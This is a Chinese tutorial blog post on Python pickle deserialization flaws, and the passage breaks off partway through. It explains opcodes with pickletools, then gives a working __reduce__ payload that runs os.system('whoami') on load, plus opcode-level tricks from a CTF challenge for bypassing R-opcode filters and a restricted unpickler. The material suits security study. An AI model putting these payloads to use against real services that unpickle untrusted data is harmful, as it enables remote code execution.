<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="Python反序列化漏洞浅析"><meta name="keywords" content="python,反序列化"><meta name="author" content="Extrader"><meta name="copyright" content="Extrader"><title>Python反序列化漏洞浅析 | Extrader</title><link rel="shortcut icon" href="/favico.ico"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/gitalk/dist/gitalk.min.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@latest/dist/gitalk.min.js"></script><script src="https://cdn.jsdelivr.net/npm/blueimp-md5@2.10.0/js/md5.min.js"></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.0"></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="false"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#pickle库"><span class="toc-number">1.</span> <span class="toc-text">pickle库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#pickletools库"><span class="toc-number">2.</span> <span class="toc-text">pickletools库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RCE"><span class="toc-number">3.</span> <span class="toc-text">RCE</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#reduce"><span class="toc-number">3.1.</span> <span class="toc-text">__reduce__</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#c指令码"><span class="toc-number">3.2.</span> <span class="toc-text">c指令码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#setstate"><span class="toc-number">3.3.</span> <span class="toc-text">setstate</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#细节"><span class="toc-number">4.</span> <span class="toc-text">细节</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#参考"><span class="toc-number">5.</span> <span class="toc-text">参考</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Extrader</div><div class="author-info__description text-center">不要给自己制造舒适区</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">26</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">19</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">友链</div><a class="author-info-links__name text-center" href="http://wlaport.top/" target="_blank" rel="noopener">Zhu</a><a class="author-info-links__name text-center" href="https://www.suk1.top/" target="_blank" rel="noopener">Manayakko</a><a class="author-info-links__name text-center" href="https://www.zhaoj.in/" target="_blank" rel="noopener">Glzjin</a><a class="author-info-links__name text-center" href="https://www.leavesongs.com/" target="_blank" rel="noopener">Phithon</a><a class="author-info-links__name text-center" href="https://www.smi1e.top/" target="_blank" rel="noopener">Smi1e</a><a class="author-info-links__name text-center" href="http://yulige.top/" target="_blank" rel="noopener">郁离歌</a><a class="author-info-links__name text-center" href="https://www.gem-love.com/" target="_blank" rel="noopener">y1ng</a><a class="author-info-links__name text-center" href="http://www.pdsdt.lovepdsdt.com/" target="_blank" rel="noopener">Pdsdt</a><a class="author-info-links__name text-center" href="https://www.sqlsec.com/" target="_blank" rel="noopener">国光</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://i.loli.net/2020/04/07/inGFRJtlS8c5BbH.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Extrader</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">首页</a><a class="site-page" href="/archives">时间轴</a><a class="site-page" href="/tags">标签</a><a class="site-page" href="/categories">分类</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">Python反序列化漏洞浅析</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-04-05</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%A4%87%E5%BF%98%E5%BD%95/">备忘录</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">3.6k</span><span class="post-meta__separator">|</span><span>阅读时长: 13 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h3 id="pickle库"><a href="#pickle库" class="headerlink" title="pickle库"></a>pickle库</h3><p>说到python反序列化就当然离不开<code>pickle</code>库</p>
<p><img src="https://i.loli.net/2020/04/05/zDW3LStBw5v97Oc.png" alt=""></p>
<p>以上例子简单的示范了python进行序列化和反序列化的操作</p>
<h3 id="pickletools库"><a href="#pickletools库" class="headerlink" title="pickletools库"></a>pickletools库</h3><p>为了能够更深层的理解python反序列化的过程，这里需要用到一个python自带的pickle调试器<code>pickletools</code>库，这个库有三个功能：</p>
<ul>
<li>反汇编一个已经被打包的字符串   <code>pickletools.dis</code></li>
<li>优化一个已经被打包的字符串       <code>pickletools.optimize</code></li>
<li>返回一个迭代器来供程序使用       <code>pickletools.genops</code></li>
</ul>
<p>一般我们使用前两个功能，可以先看一下效果：</p>
<img src="https://i.loli.net/2020/04/05/JG3tTLpeZfyYljh.png" style="zoom:80%;" />

<p>这就是反汇编的功能，解析那个字符串，然后告诉你这个字符串干了什么，每一行都是一条指令</p>
<p>序列化结构示意图（转）</p>
<p><img src="https://i.loli.net/2020/04/05/wsv23TxiOpeoMQ8.png" alt=""></p>
<p>栈是反序列化最核心的数据结构，所有的数据操作几乎都在栈上。为了应对数据嵌套，栈区分为两个部分：当前栈专注于维护最顶层的信息，前序栈保存了程序运行至今的（不在顶层的）完整的栈信息。</p>
<p>存储区可以类比内存，用于存取变量。它是一个数组，以下标为索引。它的每一个单元可以用来存储任何东西。</p>
<p>下面我们试图来序列化一个类</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">dairy</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.date = <span class="number">20202020</span></span><br><span class="line">        self.text = <span class="string">'语言'</span></span><br><span class="line">        self.tode = [<span class="string">'计'</span>,<span class="string">'算'</span>,<span class="string">'机'</span>]</span><br><span class="line">        </span><br><span class="line">today = dairy()</span><br><span class="line">print(pickle.dumps(today))</span><br><span class="line">x = pickle.dumps(today)</span><br><span class="line">x = pickletools.optimize(x)   <span class="comment">#优化，消除未使用的PUT</span></span><br><span class="line">pickletools.dis(x)     <span class="comment">#反汇编一个已经打包的字符串，优化一个已经被打包的字符串</span></span><br></pre></td></tr></table></figure>

<p><code>pickle</code>构造出的字符串有很多个版本，在<code>pickle.loads</code>时可以用<code>protocol</code>参数指定协议的版本，目前这些协议有0,1,2,3,4号版本，默认使用的是3号版本，pickle协议版本向前兼容，所以不用担心0号版本的字符串交给<code>pickle.loads</code>后会发生什么意外</p>
<ul>
<li><strong>v0</strong> 版协议是原始的 “人类可读” 协议，并且向后兼容早期版本的 Python。</li>
<li><strong>v1</strong> 版协议是较早的二进制格式，它也与早期版本的 Python 兼容。</li>
<li><strong>v2</strong> 版协议是在 Python 2.3 中引入的。它为存储 new-style class 提供了更高效的机制。欲了解有关第 2 版协议带来的改进，请参阅 PEP 307。</li>
<li><strong>v3</strong> 版协议添加于 Python 3.0。它具有对 bytes 对象的显式支持，且无法被 Python 2.x 打开。这是目前默认使用的协议，也是在要求与其他 Python 3 版本兼容时的推荐协议。</li>
<li><strong>v4</strong> 版协议添加于 Python 3.4。它支持存储非常大的对象，能存储更多种类的对象，还包括一些针对数据格式的优化。有关第 4 版协议带来改进的信息，请参阅 PEP 3154。</li>
</ul>
<p>以上代码除了将序列化后的字符串反汇编后还用<code>pickletools</code>的<code>optimize</code>方法来将反汇编后的代码进行了优化，优化后输出的结果如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">b'\x80\x03c__main__\ndairy\nq\x00)\x81q\x01&#125;q\x02(X\x04\x00\x00\x00dateq\x03J$B4\x01X\x04\x00\x00\x00textq\x04X\x06\x00\x00\x00\xe8\xaf\xad\xe8\xa8\x80q\x05X\x04\x00\x00\x00todeq\x06]q\x07(X\x03\x00\x00\x00\xe8\xae\xa1q\x08X\x03\x00\x00\x00\xe7\xae\x97q\tX\x03\x00\x00\x00\xe6\x9c\xbaq\neub.'    </span><br><span class="line">    0: \x80 PROTO      3</span><br><span class="line">    2: c    GLOBAL     '__main__ dairy'</span><br><span class="line">   18: )    EMPTY_TUPLE</span><br><span class="line">   19: \x81 NEWOBJ</span><br><span class="line">   20: &#125;    EMPTY_DICT</span><br><span class="line">   21: (    MARK</span><br><span class="line">   22: X        BINUNICODE 'date'</span><br><span class="line">   31: J        BININT     20202020</span><br><span class="line">   36: X        BINUNICODE 'text'</span><br><span class="line">   45: X        BINUNICODE '语言'</span><br><span class="line">   56: X        BINUNICODE 'tode'</span><br><span class="line">   65: ]        EMPTY_LIST</span><br><span class="line">   66: (        MARK</span><br><span class="line">   67: X            BINUNICODE '计'</span><br><span class="line">   75: X            BINUNICODE '算'</span><br><span class="line">   83: X            BINUNICODE '机'</span><br><span class="line">   91: e            APPENDS    (MARK at 66)</span><br><span class="line">   92: u        SETITEMS   (MARK at 21)</span><br><span class="line">   93: b    BUILD</span><br><span class="line">   94: .    STOP</span><br><span class="line">highest protocol among opcodes = 2</span><br></pre></td></tr></table></figure>

<p>其中因为使用了<code>optimize</code>方法省略了<code>q  BINPUT   x</code>这一行汇编指令，这行指令的意思是把当前栈的栈顶复制一份，放进存储区，</p>
<p>下面对优化后的代码一行一行的进行解释</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0: \x80 PROTO      3</span><br></pre></td></tr></table></figure>

<p><code>\x80</code>：版本(<code>protocol</code>)2后加入，机器看到这个操作符，立刻再去字符串读取一个字节，得到x03。代表这个是依据3号协议序列化的字符串，随后这个操作结束。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2: c    GLOBAL     &#39;__main__ dairy&#39;</span><br></pre></td></tr></table></figure>

<p><code>c</code>操作符：连续读取两个字符串<code>module</code>和<code>name</code>，规定以<code>\n</code>为分割给<code>find_class</code>方法，然后把<code>module.name</code>压入栈，现在读取到的是<code>main.dairy</code>，放入栈中，通常用来获取一个模块中的属性</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">18: )    EMPTY_TUPLE</span><br></pre></td></tr></table></figure>

<p><code>)</code>操作符：把一个空的<code>tuple</code>压入当前栈</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">19: \x81 NEWOBJ</span><br></pre></td></tr></table></figure>

<p><code>\x81</code>操作符：从栈中先弹出一个元素，记为<code>args</code>，再弹出一个元素记为<code>cls</code>，接下来执行<code>cls.new(cls,*args)</code>，然后把得到的东西压入栈，简单来说，从栈中弹出一个参数和一个<code>class</code>，然后利用这个参数实例化<code>class</code>，把得到的实例压入栈 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">20: &#125;    EMPTY_DICT</span><br></pre></td></tr></table></figure>

<p><code>}</code>操作符：把一个空的<code>dict</code>压进栈</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">21: (    MARK</span><br></pre></td></tr></table></figure>

<p>MARK操作符：这个操作符干的事称为<code>load_mark</code>，把当前栈这个整体，作为一个<code>list</code>，压进前序栈，把当前栈清空</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">22: X        BINUNICODE &#39;date&#39;</span><br></pre></td></tr></table></figure>

<p><code>X</code>操作符：和V操作符一样是读入字符串压入堆栈，后面跟的四个字节代表字符串长度，如：<code>X\x04\x00\x00\x00date</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">31: J        BININT     20202020</span><br></pre></td></tr></table></figure>

<p>J操作符：和X和V一样，只不过这个是4字节发的int型（个人理解）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">65: ]        EMPTY_LIST</span><br></pre></td></tr></table></figure>

<p><code>]</code>操作符，把一个空的<code>list</code>压进栈</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">91: e            APPENDS    (MARK at 66)</span><br></pre></td></tr></table></figure>

<p>MARK结束，通过最上面的（66行）堆栈片扩展堆栈上的列表，简单来说就是形成一个列表（个人理解）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">92: u        SETITEMS   (MARK at 21)</span><br></pre></td></tr></table></figure>

<p>调用<code>pop_mark</code>，把当前栈的内容扔进一个数组<code>arr</code>，然后把当前栈恢复到MARK时的状态，从27行开始区分键值对，两个一组地读<code>arr</code>里面的元素，前者作为key，后者作为value</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">93: b    BUILD</span><br></pre></td></tr></table></figure>

<p>把当前栈栈顶存进<code>state</code>，然后弹掉，把当前栈顶记为<code>inst</code>，然后弹掉，利用<code>state</code>这系列的值来更新实例<code>inst</code>，把得到的对象扔到当前栈，如果<code>inst</code>拥有<code>__setstate__</code>方法，则吧<code>state</code>交给<code>__setstate__</code>方法来处理，否则的话，直接把<code>state</code>这个<code>dist</code>的内容，合并到<code>inst.__dict__</code> 里面。实际上这里就有一个安全漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">94: .    STOP</span><br></pre></td></tr></table></figure>

<p><code>.</code>：STOP指令，当前栈顶元素就是反序列化的最终结果，把他弹出</p>
<h3 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h3><h4 id="reduce"><a href="#reduce" class="headerlink" title="__reduce__"></a><code>__reduce__</code></h4><p><code>__reduce__</code>的指令码为<code>R</code>，他在反序列化的时候干了这么一件事</p>
<ul>
<li>取当前栈的栈顶记为<code>args</code>，然后把它弹掉。</li>
<li>取当前栈的栈顶记为<code>f</code>，然后把它弹掉。</li>
<li>以<code>args</code>为参数，执行函数<code>f</code>，把结果压进当前栈。</li>
</ul>
<p>class的<code>__reduce__</code>方法在pickle反序列化的时候会被执行（类似php中的<code>__wakeup</code>），其底层的编码方法就是利用了R指令，f要么返回字符串，要么返回一个tuple，后者就可以进行利用，payload如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">dairy</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.date = <span class="number">20202020</span></span><br><span class="line">        self.text = <span class="string">'语言'</span></span><br><span class="line">        self.tode = [<span class="string">'计'</span>,<span class="string">'算'</span>,<span class="string">'机'</span>]</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__reduce__</span><span class="params">(self)</span>:</span>                      <span class="comment">#反序列化时执行，底层编码方法使用R指令码，</span></span><br><span class="line">        <span class="keyword">return</span> (os.system,(<span class="string">'whoami'</span>,))</span><br><span class="line"></span><br><span class="line">today = dairy()</span><br><span class="line"><span class="comment">#print(pickle.dumps(today))</span></span><br><span class="line">x = pickle.dumps(today)</span><br><span class="line">x = pickletools.optimize(x)  <span class="comment">#优化，消除未使用的PUT</span></span><br><span class="line">pickletools.dis(x)           <span class="comment">#反汇编一个已经打包的字符串，优化一个已经被打包的字符串</span></span><br></pre></td></tr></table></figure>

<p>得到以下结果</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'</span><br><span class="line">    0: \x80 PROTO      3</span><br><span class="line">    2: c    GLOBAL     'nt system'</span><br><span class="line">   13: X    BINUNICODE 'whoami'</span><br><span class="line">   24: \x85 TUPLE1</span><br><span class="line">   25: R    REDUCE</span><br><span class="line">   26: .    STOP</span><br><span class="line">highest protocol among opcodes = 2</span><br></pre></td></tr></table></figure>

<p>随后将序列化的内容反序列化</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">b = <span class="string">b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'</span></span><br><span class="line">hack = pickle.loads(b)</span><br></pre></td></tr></table></figure>

<p>随后就可得到命令执行的结果</p>
<h4 id="c指令码"><a href="#c指令码" class="headerlink" title="c指令码"></a>c指令码</h4><p>先来看下面一段代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">student</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,name,grade)</span>:</span></span><br><span class="line">        self.name = name</span><br><span class="line">        self.grade = grade</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__eq__</span><span class="params">(self,other)</span>:</span>     <span class="comment"># 定义内置方法,当判断两个对象的值是否相等时，触发此方法</span></span><br><span class="line">        <span class="keyword">return</span> type(other) <span class="keyword">is</span> student <span class="keyword">and</span> self.name == other.name <span class="keyword">and</span> self.grade == other.grade</span><br><span class="line">        <span class="comment">#is比较地址</span></span><br><span class="line">print(pickle.dumps(student(<span class="string">'czj'</span>,<span class="string">'extrader'</span>)))</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> blue</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(data)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">b'R'</span> <span class="keyword">in</span> data:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">'no reduce!'</span></span><br><span class="line">    x = pickle.loads(data)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(x != student(blue.name,blue.grade)):</span><br><span class="line">        <span class="keyword">return</span> <span class="string">'Not equal &gt;_&lt;'</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">'well done!'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    print(check(base64.b64decode(input())))</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>

<p><code>blue.py</code>中：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">name = <span class="string">"A"</span></span><br><span class="line">grade = <span class="string">"B"</span></span><br></pre></td></tr></table></figure>

<p>以上代码过滤了<code>R</code>指令码，<code>check</code>方法中检测到<code>input</code>的<code>date</code>中含有<code>R</code>指令码就直接被返回<code>no reduce!</code>，函数给出了一个输入点，在将<code>input</code>的<code>data</code>参数反序列化后需要其中的name和grade和blue这个module中的name和grade相对应，也就是说我们需要利用序列化后的student类，来令其相等</p>
<p>这里如果我们知道blue.py中参数的值的话，直接构造<code>name = &quot;A&quot;</code>，<code>grade = &quot;B&quot;</code>的payload即可，如下：</p>
<p><img src="https://i.loli.net/2020/04/06/XqUcTht4CfWvaI3.png" alt=""></p>
<p>但是在我们不知道blue.py的前提下如何绕过呢？这里就要用到我们的c指令码了</p>
<p>c指令码是专门用来获取一个全局变量的</p>
<p>先看一下反汇编后输出的效果</p>
<p><img src="https://i.loli.net/2020/04/06/YyC1S7LlRIBztkA.png" alt=""></p>
<p>利用c指令替换掉<code>czj</code>和<code>extrader</code>中两个字符串，将<code>pickle.dumps</code>后的<code>bytes</code>字符串中的<code>X\x03\x00\x00\x00czj</code>替换成<code>cblue\nname\n</code>，<code>X\x08\x00\x00\x00extrader</code>替换成<code>cblue\ngrade\n</code>随后base64编码后观察效果：</p>
<p><img src="https://i.loli.net/2020/04/06/JMsfShU1BWNm26n.png" alt=""></p>
<p>可以清楚的看到c指令码替换成功，随后也成功的绕过了比较</p>
<p>但如果c指令的<code>module</code>被限制了呢？c指令（也就是GLOBAL指令）基于<code>find_class</code>这个方法，然而<code>find_class</code>可以被重写，如果c指令码只允许包含<code>__main__</code>这一个<code>module</code>，又该如何解决？代码如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"><span class="keyword">import</span> blue</span><br><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">student</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self,name,grade)</span>:</span></span><br><span class="line">        self.name = name</span><br><span class="line">        self.grade = grade</span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__eq__</span><span class="params">(self,other)</span>:</span>     </span><br><span class="line">        <span class="keyword">return</span> type(other) <span class="keyword">is</span> student <span class="keyword">and</span> self.name == other.name <span class="keyword">and</span> self.grade == other.grade</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">RestrictedUnpickler</span><span class="params">(pickle.Unpickler)</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">find_class</span><span class="params">(self, module, name)</span>:</span></span><br><span class="line">        <span class="keyword">if</span> module == <span class="string">'__main__'</span>:</span><br><span class="line">            <span class="keyword">return</span> getattr(sys.modules[<span class="string">'__main__'</span>], name)</span><br><span class="line">        <span class="keyword">raise</span> pickle.UnpicklingError(<span class="string">"global '%s.%s' is forbidden"</span> % (module, name))</span><br><span class="line">        <span class="comment">#通过raise显示地引发异常。一旦执行了raise语句，raise后面的语句将不能执行。</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">restricted_loads</span><span class="params">(s)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> RestrictedUnpickler(io.BytesIO(s)).load()</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(data)</span>:</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="string">'R'</span> <span class="keyword">in</span> data:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">'no reduce!'</span></span><br><span class="line">        <span class="keyword">if</span> type(restricted_loads(eval(data))) <span class="keyword">is</span> <span class="keyword">not</span> student:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">"false!"</span></span><br><span class="line">        x = pickle.loads(eval(data))</span><br><span class="line">        <span class="keyword">if</span>(x != student(blue.name,blue.grade)):</span><br><span class="line">            <span class="keyword">return</span> <span class="string">'Not equal &gt;_&lt;'</span></span><br><span class="line">        <span class="keyword">return</span> <span class="string">'well done!'</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"Something wrong"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    print(check(base64.b64decode(input().encode(<span class="string">"utf8"</span>)).decode(<span class="string">"utf8"</span>)))</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>

<p><code>blue.py</code>中：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">name = <span class="string">"A"</span></span><br><span class="line">grade = <span class="string">"B"</span></span><br></pre></td></tr></table></figure>

<p>题目部分来自XCTF高校战疫的一道题：webtmp</p>
<p>这道题就将input的date的modules进行了判断，如果不是<code>__main__ student</code>则会引发错误然后退出，那该如何解决？</p>
<p>我们知道，通过GLOBAL引入的变量，可以看作是原变量的引用，<strong>当我们在栈上修改它的值</strong>，会导致原变量也被修改！思路如下：</p>
<ul>
<li>通过<code>__main__.blue</code>引入这一个<code>module</code>，由于命名空间还在main内，故不会拦截，也就是说，在<code>__main__</code>上再新构造一个模块，用来对数据进行改写</li>
<li>把一个<code>dict</code>压进栈，内容是<code>{&#39;name&#39;:&#39;B&#39;,&#39;grade&#39;:&#39;B&#39;}</code></li>
<li>执行<code>BUILD</code>指令，会改写<code>__main__.blue.name</code>和<code>__main__.blue.grade</code>，到这里<code>blue.name</code>和<code>blue.grade</code>已经被篡改成我们想要的内容</li>
<li>弹掉栈顶，现在栈变成空的</li>
